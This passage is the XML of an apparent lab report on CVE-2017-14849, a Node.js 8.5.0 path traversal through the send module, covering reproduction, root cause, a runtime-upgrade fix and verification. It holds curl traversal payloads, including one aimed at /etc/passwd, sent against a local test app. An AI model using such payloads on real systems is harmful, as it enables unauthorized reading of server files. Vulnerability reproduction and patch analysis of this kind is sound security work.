        <w:t xml:space="preserve">, which builds each image, waits until the application actually answers HTTP 200, issues the requests and writes the whole session to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>cve/CVE-2017-14849/docker-evidence.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the repository. That transcript is the raw evidence; the figures below show the same requests against the same application on the native runtime, where a window capture was possible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The same request against the fixed image, built from the same application and the same mounted files:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>$ docker compose -f docker-compose.fixed.yml up -d --build</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>$ docker compose -f docker-compose.fixed.yml exec node node --version</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>v8.6.0</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curl --path-as-is -s -o /dev/null -w '%{http_code}' \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">       http://127.0.0.1:3000/static/../foo/../../secret.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>404</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>$ curl --path-as-is -s -o /dev/null -w '%{http_code}' \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">       'http://127.0.0.1:3000/static/../../../a/../../../../etc/passwd'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>404</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>$ curl --path-as-is -s -o /dev/null -w '%{http_code}' http://127.0.0.1:3000/static/main.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="220"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terminal transcript: both traversal requests are rejected on the fixed runtime, and normal requests are still served. Full transcript in docker-evidence.txt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Before Docker was available on this machine the same result was obtained natively, by running the official Node.js 8.5.0 build directly; that path is kept in the repository as a fallback because it needs no container runtime at all.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Baseline and attack. The static asset is served normally; the traversal request reads a file that sits two directories above the served root:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>$ curl --path-as-is -s -o /dev/null -w '%{http_code}\n' \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">       http://127.0.0.1:3000/static/main.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>200</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curl --path-as-is -s -i 'http://127.0.0.1:3000/static/../foo/../../secret.txt'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>HTTP/1.1 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>X-Powered-By: Express</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>Accept-Ranges: bytes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>Content-Type: text/plain; charset=UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>Content-Length: 57</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SECRET_FLAG{this-file-lives-outside-the-static-root}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="220"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terminal transcript: successful path traversal. secret.txt lives outside www/static.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5544000" cy="3908066"/>
            <wp:docPr id="3" name="Picture 3"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="shot-2-exploit.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5544000" cy="3908066"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Fig. 3  CVE-2017-14849 reproduced on Node.js 8.5.0. The traversal request returns HTTP 200 and the contents of a file stored two levels above the served directory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Two reproduction details matter. curl normalises .. in a URL by default, so without --path-as-is the payload never leaves the client and the attack appears to fail. And on Windows the payload shape differs from the Linux PoC in the vulhub README, because the absolute path is built from a drive-letter root; /static/../foo/../../secret.txt is the form that escapes here.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>5.4 Root cause</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The guard inside send@0.15.6 is a normalise-then-check pattern:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>// node_modules/send/index.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>if (UP_PATH_REGEXP.test(normalize('.' + sep + path))) return this.error(403);  // L538</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>path = normalize(join(root, path));                                           // L545</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="220"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Code: the check is only as sound as normalize().</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The pattern assumes that a surviving .. segment is the signature of an escape attempt. Node 8.5.0 breaks that assumption:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>$ node-v8.5.0 -e "console.log(require('path').normalize('../foo/../../secret.txt'))"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>secret.txt</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node       -e "console.log(require('path').normalize('../foo/../../secret.txt'))"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>..\..\secret.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="220"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terminal transcript: the runtime disagrees with itself. Two leading .. segments vanish.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>After normalisation there is nothing left for the regular expression to match, so the request is classified as a clean relative path and join(root, 'secret.txt') is resolved one level above root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Classifying the error, which is what the lab asks for: this is a logic error in a language runtime library. It is not a missing input filter and not a misconfiguration. The application used the standard library exactly as documented; the library returned the wrong answer. That classification is what tells us where the fix has to go.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>5.5 Fix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Because the defect is in the runtime, the fix is a runtime upgrade and the application source does not change at all. The files in fixes/ contain the changed artefacts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t># fixes/Dockerfile.node-8.6.0   -- minimal fix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>FROM node:8.6.0</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fixes/Dockerfile.node-20      -- recommended fix: supported LTS, non-root user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>FROM node:20-alpine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>USER node</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="220"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Code: the entire patch is the base image tag.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>This is effective rather than a workaround for a specific reason. The send guard rests on an invariant of the standard library; restoring the invariant repairs every library that depends on it, not just this application. The alternative — filtering traversal sequences at the request boundary — would mean re-implementing path semantics in application code, which is precisely how the next traversal bug is born.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>5.6 Verification and regression</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The same application was restarted on a fixed runtime and the identical request replayed:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>$ node www/app.js                      # Node 24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>$ curl --path-as-is -s -i 'http://127.0.0.1:3000/static/../foo/../../secret.txt'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>HTTP/1.1 404 Not Found</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regression: legitimate functionality still works</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
